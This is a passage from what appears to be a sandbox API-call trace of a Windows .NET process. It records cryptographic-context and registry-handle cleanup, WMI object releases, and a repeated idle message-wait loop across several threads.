dwFlags=0x0) returned 1 [0236.655] CloseHandle (hObject=0x250) returned 1 [0236.656] CryptDestroyKey (hKey=0x4b74c10) returned 1 [0236.656] CryptReleaseContext (hProv=0x773068, dwFlags=0x0) returned 1 [0236.656] CryptReleaseContext (hProv=0x773068, dwFlags=0x0) returned 1 [0236.656] SysStringLen (param_1="僻暗쬘Ἦ촄駖囶齵mentVari") returned 0x10 [0236.656] CryptDestroyKey (hKey=0x4b74b90) returned 1 [0236.656] CryptReleaseContext (hProv=0x772fe0, dwFlags=0x0) returned 1 [0236.656] CryptReleaseContext (hProv=0x772fe0, dwFlags=0x0) returned 1 [0236.657] CryptDestroyKey (hKey=0x4b74b10) returned 1 [0236.657] CryptReleaseContext (hProv=0x772f58, dwFlags=0x0) returned 1 [0236.657] CryptReleaseContext (hProv=0x772f58, dwFlags=0x0) returned 1 [0236.657] CryptDestroyKey (hKey=0x4b815f0) returned 1 [0236.657] CryptReleaseContext (hProv=0x773fd0, dwFlags=0x0) returned 1 [0236.657] CryptReleaseContext (hProv=0x773fd0, dwFlags=0x0) returned 1 [0236.658] CryptDestroyKey (hKey=0x4b74a90) returned 1 [0236.658] CryptReleaseContext (hProv=0x772ed0, dwFlags=0x0) returned 1 [0236.658] CryptReleaseContext (hProv=0x772ed0, dwFlags=0x0) returned 1 [0236.658] CloseHandle (hObject=0x24c) returned 1 [0236.658] CryptDestroyKey (hKey=0x4b74a10) returned 1 [0236.658] CryptReleaseContext (hProv=0x772e48, dwFlags=0x0) returned 1 [0236.659] CryptReleaseContext (hProv=0x772e48, dwFlags=0x0) returned 1 [0236.659] CryptDestroyKey (hKey=0x4b74990) returned 1 [0236.659] CryptReleaseContext (hProv=0x772dc0, dwFlags=0x0) returned 1 [0236.659] CryptReleaseContext (hProv=0x772dc0, dwFlags=0x0) returned 1 [0236.659] CryptDestroyKey (hKey=0x4b81570) returned 1 [0236.659] CryptReleaseContext (hProv=0x773f48, dwFlags=0x0) returned 1 [0236.660] CryptDestroyKey (hKey=0x4b74910) returned 1 [0236.660] CryptReleaseContext (hProv=0x772d38, dwFlags=0x0) returned 1 [0236.660] CryptReleaseContext (hProv=0x772d38, dwFlags=0x0) returned 1 [0236.660] CryptReleaseContext (hProv=0x773f48, dwFlags=0x0) returned 1 [0236.660] CloseHandle (hObject=0x348) returned 1 [0236.661] CryptDestroyKey (hKey=0x4b74890) returned 1 [0236.661] CryptReleaseContext (hProv=0x772cb0, dwFlags=0x0) returned 1 [0236.661] CryptReleaseContext (hProv=0x772cb0, dwFlags=0x0) returned 1 [0236.661] CloseHandle (hObject=0x240) returned 1 [0236.661] CryptDestroyKey (hKey=0x4b74810) returned 1 [0236.661] CryptReleaseContext (hProv=0x772c28, dwFlags=0x0) returned 1 [0236.661] CryptReleaseContext (hProv=0x772c28, dwFlags=0x0) returned 1 [0236.662] CryptDestroyKey (hKey=0x4b74790) returned 1 [0236.662] CryptReleaseContext (hProv=0x772ba0, dwFlags=0x0) returned 1 [0236.662] CryptReleaseContext (hProv=0x772ba0, dwFlags=0x0) returned 1 [0236.662] CryptDestroyKey (hKey=0x4b814f0) returned 1 [0236.662] CryptReleaseContext (hProv=0x773ec0, dwFlags=0x0) returned 1 [0236.662] CryptReleaseContext (hProv=0x773ec0, dwFlags=0x0) returned 1 [0236.663] CryptDestroyKey (hKey=0x4b74710) returned 1 [0236.663] CryptReleaseContext (hProv=0x772b18, dwFlags=0x0) returned 1 [0236.663] CryptReleaseContext (hProv=0x772b18, dwFlags=0x0) returned 1 [0236.663] RegCloseKey (hKey=0x41c) returned 0x0 [0236.663] CryptDestroyKey (hKey=0x4b74690) returned 1 [0236.663] CryptReleaseContext (hProv=0x772a90, dwFlags=0x0) returned 1 [0236.664] CryptReleaseContext (hProv=0x772a90, dwFlags=0x0) returned 1 [0236.664] CloseHandle (hObject=0x23c) returned 1 [0236.664] CryptDestroyKey (hKey=0x4b74610) returned 1 [0236.664] CryptReleaseContext (hProv=0x772a08, dwFlags=0x0) returned 1 [0236.664] CryptReleaseContext (hProv=0x772a08, dwFlags=0x0) returned 1 [0236.664] CryptDestroyKey (hKey=0x4b81470) returned 1 [0236.665] CryptReleaseContext (hProv=0x773e38, dwFlags=0x0) returned 1 [0236.665] CryptDestroyKey (hKey=0x4b74590) returned 1 [0236.665] CryptReleaseContext (hProv=0x772980, dwFlags=0x0) returned 1 [0236.665] CryptReleaseContext (hProv=0x772980, dwFlags=0x0) returned 1 [0236.665] CryptReleaseContext (hProv=0x773e38, dwFlags=0x0) returned 1 [0236.665] CloseHandle (hObject=0x338) returned 1 [0236.666] CryptDestroyKey (hKey=0x4b74510) returned 1 [0236.666] CryptReleaseContext (hProv=0x7728f8, dwFlags=0x0) returned 1 [0236.666] CryptReleaseContext (hProv=0x7728f8, dwFlags=0x0) returned 1 [0236.666] CloseHandle (hObject=0x238) returned 1 [0236.666] CryptDestroyKey (hKey=0x4b74490) returned 1 [0236.666] CryptReleaseContext (hProv=0x772870, dwFlags=0x0) returned 1 [0236.666] CryptReleaseContext (hProv=0x772870, dwFlags=0x0) returned 1 [0236.667] CryptDestroyKey (hKey=0x4b74410) returned 1 [0236.667] CryptReleaseContext (hProv=0x7727e8, dwFlags=0x0) returned 1 [0236.667] CryptReleaseContext (hProv=0x7727e8, dwFlags=0x0) returned 1 [0236.667] CryptDestroyKey (hKey=0x4b813f0) returned 1 [0236.667] CryptReleaseContext (hProv=0x773db0, dwFlags=0x0) returned 1 [0236.667] CryptReleaseContext (hProv=0x773db0, dwFlags=0x0) returned 1 [0236.668] CryptDestroyKey (hKey=0x758f60) returned 1 [0236.668] CryptReleaseContext (hProv=0x772760, dwFlags=0x0) returned 1 [0236.668] CryptReleaseContext (hProv=0x772760, dwFlags=0x0) returned 1 [0236.668] CloseHandle (hObject=0x454) returned 1 [0236.668] CryptDestroyKey (hKey=0x758f20) returned 1 [0236.669] CryptReleaseContext (hProv=0x7726d8, dwFlags=0x0) returned 1 [0236.669] CryptReleaseContext (hProv=0x7726d8, dwFlags=0x0) returned 1 [0236.669] CloseHandle (hObject=0x234) returned 1 [0236.669] CryptDestroyKey (hKey=0x4b81370) returned 1 [0236.669] CryptReleaseContext (hProv=0x773d28, dwFlags=0x0) returned 1 [0236.669] CryptReleaseContext (hProv=0x773d28, dwFlags=0x0) returned 1 [0236.670] CloseHandle (hObject=0x230) returned 1 [0236.670] CryptDestroyKey (hKey=0x4b812f0) returned 1 [0236.670] CryptReleaseContext (hProv=0x773ca0, dwFlags=0x0) returned 1 [0236.670] CryptReleaseContext (hProv=0x773ca0, dwFlags=0x0) returned 1 [0236.671] CloseHandle (hObject=0x22c) returned 1 [0236.671] CryptDestroyKey (hKey=0x4b81270) returned 1 [0236.671] CryptReleaseContext (hProv=0x773c18, dwFlags=0x0) returned 1 [0236.671] CryptReleaseContext (hProv=0x773c18, dwFlags=0x0) returned 1 [0236.672] CloseHandle (hObject=0x228) returned 1 [0236.672] CryptDestroyKey (hKey=0x4b811f0) returned 1 [0236.672] CryptReleaseContext (hProv=0x773b90, dwFlags=0x0) returned 1 [0236.672] CryptReleaseContext (hProv=0x773b90, dwFlags=0x0) returned 1 [0236.672] CloseHandle (hObject=0x264) returned 1 [0236.673] CryptDestroyKey (hKey=0x4b81170) returned 1 [0236.673] CryptReleaseContext (hProv=0x773b08, dwFlags=0x0) returned 1 [0236.673] CryptReleaseContext (hProv=0x773b08, dwFlags=0x0) returned 1 [0236.674] CloseHandle (hObject=0x224) returned 1 [0236.675] CryptDestroyKey (hKey=0x4b810f0) returned 1 [0236.675] CryptReleaseContext (hProv=0x773a80, dwFlags=0x0) returned 1 [0236.675] CryptReleaseContext (hProv=0x773a80, dwFlags=0x0) returned 1 [0236.675] CloseHandle (hObject=0x260) returned 1 [0236.676] CryptDestroyKey (hKey=0x4b81070) returned 1 [0236.676] CryptReleaseContext (hProv=0x7739f8, dwFlags=0x0) returned 1 [0236.676] CryptReleaseContext (hProv=0x7739f8, dwFlags=0x0) returned 1 [0236.676] CryptDestroyKey (hKey=0x4b80ff0) returned 1 [0236.676] CryptReleaseContext (hProv=0x773970, dwFlags=0x0) returned 1 [0236.676] CryptReleaseContext (hProv=0x773970, dwFlags=0x0) returned 1 [0236.677] CryptDestroyKey (hKey=0x4b81870) returned 1 [0236.677] CryptReleaseContext (hProv=0x7aada0, dwFlags=0x0) returned 1 [0236.677] CryptDestroyKey (hKey=0x4b80f70) returned 1 [0236.677] CryptReleaseContext (hProv=0x7738e8, dwFlags=0x0) returned 1 [0236.677] CryptReleaseContext (hProv=0x7738e8, dwFlags=0x0) returned 1 [0236.677] CryptReleaseContext (hProv=0x7aada0, dwFlags=0x0) returned 1 [0236.677] CloseHandle (hObject=0x25c) returned 1 [0236.678] CryptDestroyKey (hKey=0x4b80ef0) returned 1 [0236.678] CryptReleaseContext (hProv=0x773860, dwFlags=0x0) returned 1 [0236.678] CryptReleaseContext (hProv=0x773860, dwFlags=0x0) returned 1 [0236.678] RegCloseKey (hKey=0x38c) returned 0x0 [0236.678] CryptDestroyKey (hKey=0x4b75310) returned 1 [0236.678] CryptReleaseContext (hProv=0x7737d8, dwFlags=0x0) returned 1 [0236.678] CryptReleaseContext (hProv=0x7737d8, dwFlags=0x0) returned 1 [0236.679] CryptDestroyKey (hKey=0x4b75290) returned 1 [0236.679] CryptReleaseContext (hProv=0x773750, dwFlags=0x0) returned 1 [0236.679] CryptReleaseContext (hProv=0x773750, dwFlags=0x0) returned 1 [0236.679] CryptDestroyKey (hKey=0x4b817f0) returned 1 [0236.679] CryptReleaseContext (hProv=0x7aad18, dwFlags=0x0) returned 1 [0236.680] CryptDestroyKey (hKey=0x4b75210) returned 1 [0236.680] CryptReleaseContext (hProv=0x7736c8, dwFlags=0x0) returned 1 [0236.680] CryptReleaseContext (hProv=0x7736c8, dwFlags=0x0) returned 1 [0236.680] CryptReleaseContext (hProv=0x7aad18, dwFlags=0x0) returned 1 [0236.680] CloseHandle (hObject=0x258) returned 1 [0236.680] CryptDestroyKey (hKey=0x4b75190) returned 1 [0236.680] CryptReleaseContext (hProv=0x773640, dwFlags=0x0) returned 1 [0236.680] CryptReleaseContext (hProv=0x773640, dwFlags=0x0) returned 1 [0236.681] CloseHandle (hObject=0x378) returned 1 [0236.681] CryptDestroyKey (hKey=0x4b75110) returned 1 [0236.681] CryptReleaseContext (hProv=0x7735b8, dwFlags=0x0) returned 1 [0236.681] CryptReleaseContext (hProv=0x7735b8, dwFlags=0x0) returned 1 [0236.682] CryptDestroyKey (hKey=0x4b75090) returned 1 [0236.682] CryptReleaseContext (hProv=0x773530, dwFlags=0x0) returned 1 [0236.682] CryptReleaseContext (hProv=0x773530, dwFlags=0x0) returned 1 [0236.682] CryptDestroyKey (hKey=0x4b81770) returned 1 [0236.682] CryptReleaseContext (hProv=0x774168, dwFlags=0x0) returned 1 [0236.682] CryptReleaseContext (hProv=0x774168, dwFlags=0x0) returned 1 [0236.682] CryptDestroyKey (hKey=0x4b75010) returned 1 [0236.682] CryptReleaseContext (hProv=0x7734a8, dwFlags=0x0) returned 1 [0236.683] CryptReleaseContext (hProv=0x7734a8, dwFlags=0x0) returned 1 [0236.683] CloseHandle (hObject=0x254) returned 1 [0236.683] CryptDestroyKey (hKey=0x4b74f90) returned 1 [0236.683] CryptReleaseContext (hProv=0x773420, dwFlags=0x0) returned 1 [0236.683] CryptReleaseContext (hProv=0x773420, dwFlags=0x0) returned 1 [0241.519] RegCloseKey (hKey=0x480) returned 0x0 [0241.519] CertFreeCRLContext (pCrlContext=0x64a97a0) returned 1 [0241.519] CertFreeCRLContext (pCrlContext=0x4b74e50) returned 1 [0241.520] RegCloseKey (hKey=0x3bc) returned 0x0 [0241.520] RegCloseKey (hKey=0x4a8) returned 0x0 [0241.520] RegCloseKey (hKey=0x488) returned 0x0 [0241.521] CloseHandle (hObject=0x254) returned 1 [0241.521] RegCloseKey (hKey=0x554) returned 0x0 [0241.521] CertCloseStore (hCertStore=0x7b33b8, dwFlags=0x0) returned 1 [0241.522] CloseHandle (hObject=0x46c) returned 1 [0241.522] RegCloseKey (hKey=0x484) returned 0x0 [0241.522] RegCloseKey (hKey=0x498) returned 0x0 [0241.522] CloseHandle (hObject=0x478) returned 1 [0241.522] CertFreeCRLContext (pCrlContext=0x4b74e50) returned 1 [0241.523] CertFreeCRLContext (pCrlContext=0x4b74ea0) returned 1 [0241.523] RegCloseKey (hKey=0x558) returned 0x0 [0241.523] CertFreeCRLContext (pCrlContext=0x4b74ef0) returned 1 [0241.523] RegCloseKey (hKey=0x528) returned 0x0 [0241.524] RegCloseKey (hKey=0x48c) returned 0x0 [0241.524] RegCloseKey (hKey=0x544) returned 0x0 [0241.524] CertFreeCRLContext (pCrlContext=0x64a97f0) returned 1 [0244.600] CoGetContextToken (in: pToken=0x46ffc30 | out: pToken=0x46ffc30) returned 0x0 [0244.600] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0244.600] WbemLocator:IUnknown:Release (This=0x7a124c) returned 0x1 [0244.601] WbemLocator:IUnknown:Release (This=0x5b2d204) returned 0x0 [0244.602] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0244.602] WbemLocator:IUnknown:Release (This=0x7a151c) returned 0x1 [0244.602] WbemLocator:IUnknown:Release (This=0x5b3323c) returned 0x0 [0244.613] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0244.613] WbemLocator:IUnknown:Release (This=0x7a17ec) returned 0x1 [0244.613] WbemLocator:IUnknown:Release (This=0x5b2ff04) returned 0x0 [0244.613] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0244.613] WbemLocator:IUnknown:Release (This=0x7a1abc) returned 0x1 [0244.613] WbemLocator:IUnknown:Release (This=0x5b3bc14) returned 0x0 [0244.614] IUnknown:Release (This=0x766108) returned 0x0 [0244.614] CoGetContextToken (in: pToken=0x46ffc30 | out: pToken=0x46ffc30) returned 0x0 [0244.614] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0244.614] WbemDefPath:IUnknown:Release (This=0x5b32fb8) returned 0x1 [0244.614] WbemDefPath:IUnknown:Release (This=0x5b32fb8) returned 0x0 [0244.614] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0244.614] WbemDefPath:IUnknown:Release (This=0x5b33178) returned 0x1 [0244.614] WbemDefPath:IUnknown:Release (This=0x5b33178) returned 0x0 [0244.614] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0244.614] WbemDefPath:IUnknown:Release (This=0x5b2fff0) returned 0x1 [0244.614] WbemDefPath:IUnknown:Release (This=0x5b2fff0) returned 0x0 [0244.614] CoGetContextToken (in: pToken=0x46ffbb8 | out: pToken=0x46ffbb8) returned 0x0 [0244.614] WbemDefPath:IUnknown:Release (This=0x5b2ff18) returned 0x1 [0244.614] WbemDefPath:IUnknown:Release (This=0x5b2ff18) returned 0x0 [0244.616] FreeContextBuffer (in: pvContextBuffer=0x64bafc0 | out: pvContextBuffer=0x64bafc0) returned 0x0 [0244.617] SysStringLen (param_1="盓ࠚǗ徖⻇퍊琣姥鹣ꌈ픾␆혽") returned 0x10 Thread: id = 163 os_tid = 0x61c Thread: id = 164 os_tid = 0x5e4 Thread: id = 165 os_tid = 0x798 Thread: id = 166 os_tid = 0x7b8 Thread: id = 167 os_tid = 0x5e0 [0227.926] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0227.932] ResetEvent (hEvent=0x244) returned 1 [0288.799] SetEvent (hEvent=0x244) returned 1 Thread: id = 168 os_tid = 0x5c8 Thread: id = 169 os_tid = 0x5d0 Thread: id = 226 os_tid = 0x30c Thread: id = 227 os_tid = 0x334 Thread: id = 228 os_tid = 0x308 Thread: id = 229 os_tid = 0x5c4 [0234.397] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0234.399] SetConsoleCtrlHandler (HandlerRoutine=0x4c609e6, Add=1) returned 1 [0234.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0234.401] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0234.401] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.5c39d4.0", lpWndClass=0x27a65e4 | out: lpWndClass=0x27a65e4) returned 0 [0234.404] CoTaskMemAlloc (cb=0x56) returned 0x7f2938 [0234.404] RegisterClassW (lpWndClass=0x5e5f804) returned 0xc126 [0234.404] CoTaskMemFree (pv=0x7f2938) [0234.405] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.5c39d4.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.5c39d4.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x20152 [0234.408] NtdllDefWindowProc_W () returned 0x0 [0234.408] NtdllDefWindowProc_W () returned 0x0 [0234.408] NtdllDefWindowProc_W () returned 0x0 [0234.408] NtdllDefWindowProc_W () returned 0x0 [0234.408] SetEvent (hEvent=0x434) returned 1 [0234.523] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0234.544] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0234.646] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0234.654] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0234.770] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0234.803] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0234.952] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0234.999] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0235.149] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0235.165] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0235.271] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0235.293] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0235.435] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0235.481] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0235.590] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0235.621] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0235.746] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0235.763] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0236.058] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0236.073] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0236.275] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0236.276] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0236.385] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0236.495] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0236.617] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0236.647] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0236.744] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0236.768] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0236.869] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0236.885] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.050] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0237.072] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.182] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0237.197] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.322] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0237.337] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.446] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0237.465] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.575] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0237.587] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.696] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0237.715] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.868] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0237.884] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0237.993] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0238.008] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.117] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0238.133] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.243] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0238.258] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.367] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0238.382] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.492] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0238.507] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.616] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0238.632] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0238.741] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0238.757] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0239.053] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0239.069] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0239.178] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0239.194] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0239.303] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0239.319] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0239.631] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0239.646] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0239.756] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0239.771] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0239.880] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0239.896] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0240.098] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0240.114] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0240.223] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0240.241] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0240.351] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0240.364] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0240.475] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0240.488] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0240.598] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0240.613] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0240.722] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0240.738] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0240.848] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0240.863] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0240.972] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0240.987] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0241.097] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0241.112] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0241.222] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0241.247] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0241.346] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0241.362] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0241.549] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0241.565] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0241.674] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0241.690] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0241.799] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0241.814] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0241.924] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0241.941] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0242.051] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0242.064] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, 